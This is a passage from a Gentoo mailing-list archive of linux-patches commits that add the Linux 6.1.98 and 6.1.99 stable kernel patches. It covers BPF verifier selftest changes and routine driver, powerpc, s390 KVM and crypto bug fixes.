+-	BPF_EXIT_INSN(),
+-	BPF_MOV64_IMM(BPF_REG_4, 1),
+-	BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
+-	BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -8),
+-	BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),
+-	BPF_LD_MAP_FD(BPF_REG_1, 0),
+-	BPF_EMIT_CALL(BPF_FUNC_sk_storage_get),
+-	BPF_MOV64_IMM(BPF_REG_0, 0),
+-	BPF_EXIT_INSN(),
+-	},
+-	.fixup_sk_storage_map = { 14 },
+-	.prog_type = BPF_PROG_TYPE_SCHED_CLS,
+-	.result = REJECT,
+-	.errstr = "invalid indirect read from stack",
+-},
+ {
+ 	"bpf_map_lookup_elem(smap, &key)",
+ 	.insns = {
+diff --git a/tools/testing/selftests/bpf/verifier/spill_fill.c b/tools/testing/selftests/bpf/verifier/spill_fill.c
+index e23f07175e1bf..53286a7b49aab 100644
+--- a/tools/testing/selftests/bpf/verifier/spill_fill.c
++++ b/tools/testing/selftests/bpf/verifier/spill_fill.c
+@@ -171,9 +171,10 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.result = REJECT,
+-	.errstr = "invalid read from stack off -4+0 size 4",
+-	.prog_type = BPF_PROG_TYPE_SCHED_CLS,
++	.result_unpriv = REJECT,
++	.errstr_unpriv = "invalid read from stack off -4+0 size 4",
++	/* in privileged mode reads from uninitialized stack locations are permitted */
++	.result = ACCEPT,
+ },
+ {
+ 	"Spill a u32 const scalar.  Refill as u16.  Offset to skb->data",
+diff --git a/tools/testing/selftests/bpf/verifier/var_off.c b/tools/testing/selftests/bpf/verifier/var_off.c
+index d37f512fad16e..b183e26c03f10 100644
+--- a/tools/testing/selftests/bpf/verifier/var_off.c
++++ b/tools/testing/selftests/bpf/verifier/var_off.c
+@@ -212,31 +212,6 @@
+ 	.result = REJECT,
+ 	.prog_type = BPF_PROG_TYPE_LWT_IN,
+ },
+-{
+-	"indirect variable-offset stack access, max_off+size > max_initialized",
+-	.insns = {
+-	/* Fill only the second from top 8 bytes of the stack. */
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -16, 0),
+-	/* Get an unknown value. */
+-	BPF_LDX_MEM(BPF_W, BPF_REG_2, BPF_REG_1, 0),
+-	/* Make it small and 4-byte aligned. */
+-	BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 4),
+-	BPF_ALU64_IMM(BPF_SUB, BPF_REG_2, 16),
+-	/* Add it to fp.  We now have either fp-12 or fp-16, but we don't know
+-	 * which. fp-12 size 8 is partially uninitialized stack.
+-	 */
+-	BPF_ALU64_REG(BPF_ADD, BPF_REG_2, BPF_REG_10),
+-	/* Dereference it indirectly. */
+-	BPF_LD_MAP_FD(BPF_REG_1, 0),
+-	BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
+-	BPF_MOV64_IMM(BPF_REG_0, 0),
+-	BPF_EXIT_INSN(),
+-	},
+-	.fixup_map_hash_8b = { 5 },
+-	.errstr = "invalid indirect read from stack R2 var_off",
+-	.result = REJECT,
+-	.prog_type = BPF_PROG_TYPE_LWT_IN,
+-},
+ {
+ 	"indirect variable-offset stack access, min_off < min_initialized",
+ 	.insns = {
+@@ -289,33 +264,6 @@
+ 	.result = ACCEPT,
+ 	.prog_type = BPF_PROG_TYPE_CGROUP_SKB,
+ },
+-{
+-	"indirect variable-offset stack access, uninitialized",
+-	.insns = {
+-	BPF_MOV64_IMM(BPF_REG_2, 6),
+-	BPF_MOV64_IMM(BPF_REG_3, 28),
+-	/* Fill the top 16 bytes of the stack. */
+-	BPF_ST_MEM(BPF_W, BPF_REG_10, -16, 0),
+-	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+-	/* Get an unknown value. */
+-	BPF_LDX_MEM(BPF_W, BPF_REG_4, BPF_REG_1, 0),
+-	/* Make it small and 4-byte aligned. */
+-	BPF_ALU64_IMM(BPF_AND, BPF_REG_4, 4),
+-	BPF_ALU64_IMM(BPF_SUB, BPF_REG_4, 16),
+-	/* Add it to fp.  We now have either fp-12 or fp-16, we don't know
+-	 * which, but either way it points to initialized stack.
+-	 */
+-	BPF_ALU64_REG(BPF_ADD, BPF_REG_4, BPF_REG_10),
+-	BPF_MOV64_IMM(BPF_REG_5, 8),
+-	/* Dereference it indirectly. */
+-	BPF_EMIT_CALL(BPF_FUNC_getsockopt),
+-	BPF_MOV64_IMM(BPF_REG_0, 0),
+-	BPF_EXIT_INSN(),
+-	},
+-	.errstr = "invalid indirect read from stack R4 var_off",
+-	.result = REJECT,
+-	.prog_type = BPF_PROG_TYPE_SOCK_OPS,
+-},
+ {
+ 	"indirect variable-offset stack access, ok",
+ 	.insns = {
+diff --git a/tools/testing/selftests/wireguard/qemu/Makefile b/tools/testing/selftests/wireguard/qemu/Makefile
+index e95bd56b332f7..35856b11c1435 100644
+--- a/tools/testing/selftests/wireguard/qemu/Makefile
++++ b/tools/testing/selftests/wireguard/qemu/Makefile
+@@ -109,9 +109,9 @@ KERNEL_ARCH := x86_64
+ KERNEL_BZIMAGE := $(KERNEL_BUILD_PATH)/arch/x86/boot/bzImage
+ QEMU_VPORT_RESULT := virtio-serial-device
+ ifeq ($(HOST_ARCH),$(ARCH))
+-QEMU_MACHINE := -cpu host -machine microvm,accel=kvm,pit=off,pic=off,rtc=off -no-acpi
++QEMU_MACHINE := -cpu host -machine microvm,accel=kvm,pit=off,pic=off,rtc=off,acpi=off
+ else
+-QEMU_MACHINE := -cpu max -machine microvm -no-acpi
++QEMU_MACHINE := -cpu max -machine microvm,acpi=off
+ endif
+ else ifeq ($(ARCH),i686)
+ CHOST := i686-linux-musl
+@@ -120,9 +120,9 @@ KERNEL_ARCH := x86
+ KERNEL_BZIMAGE := $(KERNEL_BUILD_PATH)/arch/x86/boot/bzImage
+ QEMU_VPORT_RESULT := virtio-serial-device
+ ifeq ($(subst x86_64,i686,$(HOST_ARCH)),$(ARCH))
+-QEMU_MACHINE := -cpu host -machine microvm,accel=kvm,pit=off,pic=off,rtc=off -no-acpi
++QEMU_MACHINE := -cpu host -machine microvm,accel=kvm,pit=off,pic=off,rtc=off,acpi=off
+ else
+-QEMU_MACHINE := -cpu coreduo -machine microvm -no-acpi
++QEMU_MACHINE := -cpu coreduo -machine microvm,acpi=off
+ endif
+ else ifeq ($(ARCH),mips64)
+ CHOST := mips64-linux-musl


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-07-15 11:16 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-07-15 11:16 UTC (permalink / raw
  To: gentoo-commits

commit:     63cc1990b8eee9825a213c9b2d261c8d3ab78b90
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Jul 15 11:16:37 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Jul 15 11:16:37 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=63cc1990

Linux patch 6.1.99

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |  4 ++++
 1098_linux-6.1.99.patch | 37 +++++++++++++++++++++++++++++++++++++
 2 files changed, 41 insertions(+)

diff --git a/0000_README b/0000_README
index 67ef8e56..6e536b9a 100644
--- a/0000_README
+++ b/0000_README
@@ -435,6 +435,10 @@ Patch:  1097_linux-6.1.98.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.98
 
+Patch:  1098_linux-6.1.99.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.99
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1098_linux-6.1.99.patch b/1098_linux-6.1.99.patch
new file mode 100644
index 00000000..b548a275
--- /dev/null
+++ b/1098_linux-6.1.99.patch
@@ -0,0 +1,37 @@
+diff --git a/Makefile b/Makefile
+index c9a630cdb2ec2..c12da8fcb089b 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 98
++SUBLEVEL = 99
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index be5b0ff2966fe..7549c430c4f01 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -2631,17 +2631,16 @@ static int handle_tx_event(struct xhci_hcd *xhci,
+ 			else
+ 				xhci_handle_halted_endpoint(xhci, ep, 0, NULL,
+ 							    EP_SOFT_RESET);
+-			break;
++			goto cleanup;
+ 		case COMP_RING_UNDERRUN:
+ 		case COMP_RING_OVERRUN:
+ 		case COMP_STOPPED_LENGTH_INVALID:
+-			break;
++			goto cleanup;
+ 		default:
+ 			xhci_err(xhci, "ERROR Transfer event for unknown stream ring slot %u ep %u\n",
+ 				 slot_id, ep_index);
+ 			goto err_out;
+ 		}
+-		return 0;
+ 	}
+ 
+ 	/* Count current td numbers if ep->skip is set */


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-07-11 11:49 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-07-11 11:49 UTC (permalink / raw
  To: gentoo-commits

commit:     36635be3a2dfb97f52a0c05f27c9fedcb70e08e3
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jul 11 11:49:17 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jul 11 11:49:17 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=36635be3

Linux patch 6.1.98

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1097_linux-6.1.98.patch | 3629 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3633 insertions(+)

diff --git a/0000_README b/0000_README
index 13913ad0..67ef8e56 100644
--- a/0000_README
+++ b/0000_README
@@ -431,6 +431,10 @@ Patch:  1096_linux-6.1.97.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.97
 
+Patch:  1097_linux-6.1.98.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.98
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1097_linux-6.1.98.patch b/1097_linux-6.1.98.patch
new file mode 100644
index 00000000..ed79fc38
--- /dev/null
+++ b/1097_linux-6.1.98.patch
@@ -0,0 +1,3629 @@
+diff --git a/Makefile b/Makefile
+index c2148be2ba340..c9a630cdb2ec2 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 97
++SUBLEVEL = 98
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3566-quartz64-b.dts b/arch/arm64/boot/dts/rockchip/rk3566-quartz64-b.dts
+index b276eb0810c70..0ab611e9fbb7c 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3566-quartz64-b.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3566-quartz64-b.dts
+@@ -290,7 +290,7 @@ vdd_gpu: DCDC_REG2 {
+ 				regulator-name = "vdd_gpu";
+ 				regulator-always-on;
+ 				regulator-boot-on;
+-				regulator-min-microvolt = <900000>;
++				regulator-min-microvolt = <500000>;
+ 				regulator-max-microvolt = <1350000>;
+ 				regulator-init-microvolt = <900000>;
+ 				regulator-ramp-delay = <6001>;
+diff --git a/arch/powerpc/include/asm/interrupt.h b/arch/powerpc/include/asm/interrupt.h
+index 6d8492b6e2b83..4999de47b4a38 100644
+--- a/arch/powerpc/include/asm/interrupt.h
++++ b/arch/powerpc/include/asm/interrupt.h
+@@ -355,6 +355,14 @@ static inline void interrupt_nmi_enter_prepare(struct pt_regs *regs, struct inte
+ 	if (IS_ENABLED(CONFIG_KASAN))
+ 		return;
+ 
++	/*
++	 * Likewise, do not use it in real mode if the percpu first chunk is
++	 * not embedded. With CONFIG_NEED_PER_CPU_PAGE_FIRST_CHUNK enabled,
++	 * percpu allocations may come from the vmalloc area.
++	 */
++	if (percpu_first_chunk_is_paged)
++		return;
++
+ 	/* Otherwise, it should be safe to call it */
+ 	nmi_enter();
+ }
+@@ -370,6 +378,8 @@ static inline void interrupt_nmi_exit_prepare(struct pt_regs *regs, struct inter
+ 		// no nmi_exit for a pseries hash guest taking a real mode exception
+ 	} else if (IS_ENABLED(CONFIG_KASAN)) {
+ 		// no nmi_exit for KASAN in real mode
++	} else if (percpu_first_chunk_is_paged) {
++		// no nmi_exit if percpu first chunk is not embedded
+ 	} else {
+ 		nmi_exit();
+ 	}
+diff --git a/arch/powerpc/include/asm/io.h b/arch/powerpc/include/asm/io.h
+index 0e1745e5125b0..6d3ce049babdf 100644
+--- a/arch/powerpc/include/asm/io.h
++++ b/arch/powerpc/include/asm/io.h
+@@ -42,7 +42,7 @@ extern struct pci_dev *isa_bridge_pcidev;
+  * define properly based on the platform
+  */
+ #ifndef CONFIG_PCI
+-#define _IO_BASE	0
++#define _IO_BASE	POISON_POINTER_DELTA
+ #define _ISA_MEM_BASE	0
+ #define PCI_DRAM_OFFSET 0
+ #elif defined(CONFIG_PPC32)
+diff --git a/arch/powerpc/include/asm/percpu.h b/arch/powerpc/include/asm/percpu.h
+index 8e5b7d0b851c6..634970ce13c6b 100644
+--- a/arch/powerpc/include/asm/percpu.h
++++ b/arch/powerpc/include/asm/percpu.h
+@@ -15,6 +15,16 @@
+ #endif /* CONFIG_SMP */
+ #endif /* __powerpc64__ */
+ 
++#if defined(CONFIG_NEED_PER_CPU_PAGE_FIRST_CHUNK) && defined(CONFIG_SMP)
++#include <linux/jump_label.h>
++DECLARE_STATIC_KEY_FALSE(__percpu_first_chunk_is_paged);
++
++#define percpu_first_chunk_is_paged	\
++		(static_key_enabled(&__percpu_first_chunk_is_paged.key))
++#else
++#define percpu_first_chunk_is_paged	false
++#endif /* CONFIG_PPC64 && CONFIG_SMP */
++
+ #include <asm-generic/percpu.h>
+ 
+ #include <asm/paca.h>
+diff --git a/arch/powerpc/kernel/setup_64.c b/arch/powerpc/kernel/setup_64.c
+index b2e0d3ce4261c..7662265f24337 100644
+--- a/arch/powerpc/kernel/setup_64.c
++++ b/arch/powerpc/kernel/setup_64.c
+@@ -834,6 +834,7 @@ static __init int pcpu_cpu_to_node(int cpu)
+ 
+ unsigned long __per_cpu_offset[NR_CPUS] __read_mostly;
+ EXPORT_SYMBOL(__per_cpu_offset);
++DEFINE_STATIC_KEY_FALSE(__percpu_first_chunk_is_paged);
+ 
+ void __init setup_per_cpu_areas(void)
+ {
+@@ -876,6 +877,7 @@ void __init setup_per_cpu_areas(void)
+ 	if (rc < 0)
+ 		panic("cannot initialize percpu area (err=%d)", rc);
+ 
++	static_key_enable(&__percpu_first_chunk_is_paged.key);
+ 	delta = (unsigned long)pcpu_base_addr - (unsigned long)__per_cpu_start;
+ 	for_each_possible_cpu(cpu) {
+                 __per_cpu_offset[cpu] = delta + pcpu_unit_offsets[cpu];
+diff --git a/arch/powerpc/kexec/core_64.c b/arch/powerpc/kexec/core_64.c
+index a79e28c91e2be..e465e44877376 100644
+--- a/arch/powerpc/kexec/core_64.c
++++ b/arch/powerpc/kexec/core_64.c
+@@ -26,6 +26,7 @@
+ #include <asm/paca.h>
+ #include <asm/mmu.h>
+ #include <asm/sections.h>	/* _end */
++#include <asm/setup.h>
+ #include <asm/smp.h>
+ #include <asm/hw_breakpoint.h>
+ #include <asm/svm.h>
+@@ -316,6 +317,16 @@ void default_machine_kexec(struct kimage *image)
+ 	if (!kdump_in_progress())
+ 		kexec_prepare_cpus();
+ 
++#ifdef CONFIG_PPC_PSERIES
++	/*
++	 * This must be done after other CPUs have shut down, otherwise they
++	 * could execute the 'scv' instruction, which is not supported with
++	 * reloc disabled (see configure_exceptions()).
++	 */
++	if (firmware_has_feature(FW_FEATURE_SET_MODE))
++		pseries_disable_reloc_on_exc();
++#endif
++
+ 	printk("kexec: Starting switchover sequence.\n");
+ 
+ 	/* switch to a staticly allocated stack.  Based on irq stack code.
+diff --git a/arch/powerpc/platforms/pseries/kexec.c b/arch/powerpc/platforms/pseries/kexec.c
+index 096d09ed89f67..431be156ca9bb 100644
+--- a/arch/powerpc/platforms/pseries/kexec.c
++++ b/arch/powerpc/platforms/pseries/kexec.c
+@@ -61,11 +61,3 @@ void pseries_kexec_cpu_down(int crash_shutdown, int secondary)
+ 	} else
+ 		xics_kexec_teardown_cpu(secondary);
+ }
+-
+-void pseries_machine_kexec(struct kimage *image)
+-{
+-	if (firmware_has_feature(FW_FEATURE_SET_MODE))
+-		pseries_disable_reloc_on_exc();
+-
+-	default_machine_kexec(image);
+-}
+diff --git a/arch/powerpc/platforms/pseries/pseries.h b/arch/powerpc/platforms/pseries/pseries.h
+index 1d75b7742ef00..3f9b51298aa34 100644
+--- a/arch/powerpc/platforms/pseries/pseries.h
++++ b/arch/powerpc/platforms/pseries/pseries.h
+@@ -38,7 +38,6 @@ static inline void smp_init_pseries(void) { }
+ #endif
+ 
+ extern void pseries_kexec_cpu_down(int crash_shutdown, int secondary);
+-void pseries_machine_kexec(struct kimage *image);
+ 
+ extern void pSeries_final_fixup(void);
+ 
+diff --git a/arch/powerpc/platforms/pseries/setup.c b/arch/powerpc/platforms/pseries/setup.c
+index a0701dbdb1348..df07726192000 100644
+--- a/arch/powerpc/platforms/pseries/setup.c
++++ b/arch/powerpc/platforms/pseries/setup.c
+@@ -1149,7 +1149,6 @@ define_machine(pseries) {
+ 	.machine_check_exception = pSeries_machine_check_exception,
+ 	.machine_check_log_err	= pSeries_machine_check_log_err,
+ #ifdef CONFIG_KEXEC_CORE
+-	.machine_kexec          = pseries_machine_kexec,
+ 	.kexec_cpu_down         = pseries_kexec_cpu_down,
+ #endif
+ #ifdef CONFIG_MEMORY_HOTPLUG
+diff --git a/arch/powerpc/xmon/xmon.c b/arch/powerpc/xmon/xmon.c
+index cd692f399cd18..72307168d38ac 100644
+--- a/arch/powerpc/xmon/xmon.c
++++ b/arch/powerpc/xmon/xmon.c
+@@ -1354,7 +1354,7 @@ static int cpu_cmd(void)
+ 	}
+ 	termch = cpu;
+ 
+-	if (!scanhex(&cpu)) {
++	if (!scanhex(&cpu) || cpu >= num_possible_cpus()) {
+ 		/* print cpus waiting or in xmon */
+ 		printf("cpus stopped:");
+ 		last_cpu = first_cpu = NR_CPUS;
+@@ -2776,7 +2776,7 @@ static void dump_pacas(void)
+ 
+ 	termch = c;	/* Put c back, it wasn't 'a' */
+ 
+-	if (scanhex(&num))
++	if (scanhex(&num) && num < num_possible_cpus())
+ 		dump_one_paca(num);
+ 	else
+ 		dump_one_paca(xmon_owner);
+@@ -2849,7 +2849,7 @@ static void dump_xives(void)
+ 
+ 	termch = c;	/* Put c back, it wasn't 'a' */
+ 
+-	if (scanhex(&num))
++	if (scanhex(&num) && num < num_possible_cpus())
+ 		dump_one_xive(num);
+ 	else
+ 		dump_one_xive(xmon_owner);
+diff --git a/arch/riscv/kernel/machine_kexec.c b/arch/riscv/kernel/machine_kexec.c
+index 2d139b724bc84..ccb0c5d5c63c4 100644
+--- a/arch/riscv/kernel/machine_kexec.c
++++ b/arch/riscv/kernel/machine_kexec.c
+@@ -147,20 +147,12 @@ static void machine_kexec_mask_interrupts(void)
+ 
+ 	for_each_irq_desc(i, desc) {
+ 		struct irq_chip *chip;
+-		int ret;
+ 
+ 		chip = irq_desc_get_chip(desc);
+ 		if (!chip)
+ 			continue;
+ 
+-		/*
+-		 * First try to remove the active state. If this
+-		 * fails, try to EOI the interrupt.
+-		 */
+-		ret = irq_set_irqchip_state(i, IRQCHIP_STATE_ACTIVE, false);
+-
+-		if (ret && irqd_irq_inprogress(&desc->irq_data) &&
+-		    chip->irq_eoi)
++		if (chip->irq_eoi && irqd_irq_inprogress(&desc->irq_data))
+ 			chip->irq_eoi(&desc->irq_data);
+ 
+ 		if (chip->irq_mask)
+diff --git a/arch/s390/include/asm/kvm_host.h b/arch/s390/include/asm/kvm_host.h
+index 09abf000359f8..0ef662fbade0d 100644
+--- a/arch/s390/include/asm/kvm_host.h
++++ b/arch/s390/include/asm/kvm_host.h
+@@ -427,6 +427,7 @@ struct kvm_vcpu_stat {
+ 	u64 instruction_io_other;
+ 	u64 instruction_lpsw;
+ 	u64 instruction_lpswe;
++	u64 instruction_lpswey;
+ 	u64 instruction_pfmf;
+ 	u64 instruction_ptff;
+ 	u64 instruction_sck;
+diff --git a/arch/s390/kvm/kvm-s390.c b/arch/s390/kvm/kvm-s390.c
+index 348d49268a7ec..e6606ff91921a 100644
+--- a/arch/s390/kvm/kvm-s390.c
++++ b/arch/s390/kvm/kvm-s390.c
+@@ -132,6 +132,7 @@ const struct _kvm_stats_desc kvm_vcpu_stats_desc[] = {
+ 	STATS_DESC_COUNTER(VCPU, instruction_io_other),
+ 	STATS_DESC_COUNTER(VCPU, instruction_lpsw),
+ 	STATS_DESC_COUNTER(VCPU, instruction_lpswe),
++	STATS_DESC_COUNTER(VCPU, instruction_lpswey),
+ 	STATS_DESC_COUNTER(VCPU, instruction_pfmf),
+ 	STATS_DESC_COUNTER(VCPU, instruction_ptff),
+ 	STATS_DESC_COUNTER(VCPU, instruction_sck),
+diff --git a/arch/s390/kvm/kvm-s390.h b/arch/s390/kvm/kvm-s390.h
+index 4755492dfabc6..bb8d1a050b669 100644
+--- a/arch/s390/kvm/kvm-s390.h
++++ b/arch/s390/kvm/kvm-s390.h
+@@ -119,6 +119,21 @@ static inline u64 kvm_s390_get_base_disp_s(struct kvm_vcpu *vcpu, u8 *ar)
+ 	return (base2 ? vcpu->run->s.regs.gprs[base2] : 0) + disp2;
+ }
+ 
++static inline u64 kvm_s390_get_base_disp_siy(struct kvm_vcpu *vcpu, u8 *ar)
++{
++	u32 base1 = vcpu->arch.sie_block->ipb >> 28;
++	s64 disp1;
++
++	/* The displacement is a 20bit _SIGNED_ value */
++	disp1 = sign_extend64(((vcpu->arch.sie_block->ipb & 0x0fff0000) >> 16) +
++			      ((vcpu->arch.sie_block->ipb & 0xff00) << 4), 19);
++
++	if (ar)
++		*ar = base1;
++
++	return (base1 ? vcpu->run->s.regs.gprs[base1] : 0) + disp1;
++}
++
+ static inline void kvm_s390_get_base_disp_sse(struct kvm_vcpu *vcpu,
+ 					      u64 *address1, u64 *address2,
+ 					      u8 *ar_b1, u8 *ar_b2)
+diff --git a/arch/s390/kvm/priv.c b/arch/s390/kvm/priv.c
+index 3335fa09b6f1d..9af826d093efc 100644
+--- a/arch/s390/kvm/priv.c
++++ b/arch/s390/kvm/priv.c
+@@ -794,6 +794,36 @@ static int handle_lpswe(struct kvm_vcpu *vcpu)
+ 	return 0;
+ }
+ 
++static int handle_lpswey(struct kvm_vcpu *vcpu)
++{
++	psw_t new_psw;
++	u64 addr;
++	int rc;
++	u8 ar;
++
++	vcpu->stat.instruction_lpswey++;
++
++	if (!test_kvm_facility(vcpu->kvm, 193))
++		return kvm_s390_inject_program_int(vcpu, PGM_OPERATION);
++
++	if (vcpu->arch.sie_block->gpsw.mask & PSW_MASK_PSTATE)
++		return kvm_s390_inject_program_int(vcpu, PGM_PRIVILEGED_OP);
++
++	addr = kvm_s390_get_base_disp_siy(vcpu, &ar);
++	if (addr & 7)
++		return kvm_s390_inject_program_int(vcpu, PGM_SPECIFICATION);
++
++	rc = read_guest(vcpu, addr, ar, &new_psw, sizeof(new_psw));
++	if (rc)
++		return kvm_s390_inject_prog_cond(vcpu, rc);
++
++	vcpu->arch.sie_block->gpsw = new_psw;
++	if (!is_valid_psw(&vcpu->arch.sie_block->gpsw))
++		return kvm_s390_inject_program_int(vcpu, PGM_SPECIFICATION);
++
++	return 0;
++}
++
+ static int handle_stidp(struct kvm_vcpu *vcpu)
+ {
+ 	u64 stidp_data = vcpu->kvm->arch.model.cpuid;
+@@ -1460,6 +1490,8 @@ int kvm_s390_handle_eb(struct kvm_vcpu *vcpu)
+ 	case 0x61:
+ 	case 0x62:
+ 		return handle_ri(vcpu);
++	case 0x71:
++		return handle_lpswey(vcpu);
+ 	default:
+ 		return -EOPNOTSUPP;
+ 	}
+diff --git a/crypto/aead.c b/crypto/aead.c
+index 16991095270d2..c4ece86c45bc4 100644
+--- a/crypto/aead.c
++++ b/crypto/aead.c
+@@ -35,8 +35,7 @@ static int setkey_unaligned(struct crypto_aead *tfm, const u8 *key,
+ 	alignbuffer = (u8 *)ALIGN((unsigned long)buffer, alignmask + 1);
+ 	memcpy(alignbuffer, key, keylen);
+ 	ret = crypto_aead_alg(tfm)->setkey(tfm, alignbuffer, keylen);
+-	memset(alignbuffer, 0, keylen);
+-	kfree(buffer);
++	kfree_sensitive(buffer);
+ 	return ret;
+ }
+ 
+diff --git a/crypto/cipher.c b/crypto/cipher.c
+index b47141ed4a9f3..395f0c2fbb9ff 100644
+--- a/crypto/cipher.c
++++ b/crypto/cipher.c
+@@ -34,8 +34,7 @@ static int setkey_unaligned(struct crypto_cipher *tfm, const u8 *key,
+ 	alignbuffer = (u8 *)ALIGN((unsigned long)buffer, alignmask + 1);
+ 	memcpy(alignbuffer, key, keylen);
+ 	ret = cia->cia_setkey(crypto_cipher_tfm(tfm), alignbuffer, keylen);
+-	memset(alignbuffer, 0, keylen);
+-	kfree(buffer);
++	kfree_sensitive(buffer);
+ 	return ret;
+ 
+ }
+diff --git a/drivers/base/regmap/regmap-i2c.c b/drivers/base/regmap/regmap-i2c.c
+index 3ec611dc0c09f..a905e955bbfc7 100644
+--- a/drivers/base/regmap/regmap-i2c.c
++++ b/drivers/base/regmap/regmap-i2c.c
+@@ -350,7 +350,8 @@ static const struct regmap_bus *regmap_get_i2c_bus(struct i2c_client *i2c,
+ 
+ 		if (quirks->max_write_len &&
+ 		    (bus->max_raw_write == 0 || bus->max_raw_write > quirks->max_write_len))
+-			max_write = quirks->max_write_len;
++			max_write = quirks->max_write_len -
++				(config->reg_bits + config->pad_bits) / BITS_PER_BYTE;
+ 
+ 		if (max_read || max_write) {
+ 			ret_bus = kmemdup(bus, sizeof(*bus), GFP_KERNEL);
+diff --git a/drivers/block/null_blk/zoned.c b/drivers/block/null_blk/zoned.c
+index b0264b3df6f3d..206c2a7a5100e 100644
+--- a/drivers/block/null_blk/zoned.c
++++ b/drivers/block/null_blk/zoned.c
+@@ -83,6 +83,17 @@ int null_init_zoned_dev(struct nullb_device *dev, struct request_queue *q)
+ 		return -EINVAL;
+ 	}
+ 
++	/*
++	 * If a smaller zone capacity was requested, do not allow a smaller
++	 * last zone at the same time, since such a zone configuration does
++	 * not correspond to any real zoned device.
++	 */
++	if (dev->zone_capacity != dev->zone_size &&
++	    dev->size & (dev->zone_size - 1)) {
++		pr_err("A smaller last zone is not allowed with zone capacity smaller than zone size.\n");
++		return -EINVAL;
++	}
++
+ 	zone_capacity_sects = mb_to_sects(dev->zone_capacity);
+ 	dev_capacity_sects = mb_to_sects(dev->size);
+ 	dev->zone_size_sects = mb_to_sects(dev->zone_size);
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 070014d0fc994..4fddb4666d54e 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -2385,15 +2385,27 @@ static void qca_serdev_shutdown(struct device *dev)
+ 	struct qca_serdev *qcadev = serdev_device_get_drvdata(serdev);
+ 	struct hci_uart *hu = &qcadev->serdev_hu;
+ 	struct hci_dev *hdev = hu->hdev;
+-	struct qca_data *qca = hu->priv;
+ 	const u8 ibs_wake_cmd[] = { 0xFD };
+ 	const u8 edl_reset_soc_cmd[] = { 0x01, 0x00, 0xFC, 0x01, 0x05 };
+ 
+ 	if (qcadev->btsoc_type == QCA_QCA6390) {
+-		if (test_bit(QCA_BT_OFF, &qca->flags) ||
+-		    !test_bit(HCI_RUNNING, &hdev->flags))
++		/* The purpose of sending the VSC is to reset the SoC into an
++		 * initial state that ensures the next hdev->setup() succeeds.
++		 * If HCI_QUIRK_NON_PERSISTENT_SETUP is set, hdev->setup() can
++		 * do its job regardless of the SoC state, so there is no need
++		 * to send the VSC.
++		 * If HCI_SETUP is set, hdev->setup() was never invoked and the
++		 * SoC is already in the initial state, so the VSC is not
++		 * needed in that case either.
++		 */
++		if (test_bit(HCI_QUIRK_NON_PERSISTENT_SETUP, &hdev->quirks) ||
++		    hci_dev_test_flag(hdev, HCI_SETUP))
+ 			return;
+ 
++		/* The serdev must be in the open state when control logic
++		 * arrives here; this also fixes the use-after-free caused by
++		 * flushing or writing to the serdev after it has been closed.
++		 */
+ 		serdev_device_write_flush(serdev);
+ 		ret = serdev_device_write_buf(serdev, ibs_wake_cmd,
+ 					      sizeof(ibs_wake_cmd));
+diff --git a/drivers/cdrom/cdrom.c b/drivers/cdrom/cdrom.c
+index 416f723a2dbb3..8e3eeb96db63e 100644
+--- a/drivers/cdrom/cdrom.c
++++ b/drivers/cdrom/cdrom.c
+@@ -2372,7 +2372,7 @@ static int cdrom_ioctl_timed_media_change(struct cdrom_device_info *cdi,
+ 		return -EFAULT;
+ 
+ 	tmp_info.media_flags = 0;
+-	if (tmp_info.last_media_change - cdi->last_media_change_ms < 0)
++	if (cdi->last_media_change_ms > tmp_info.last_media_change)
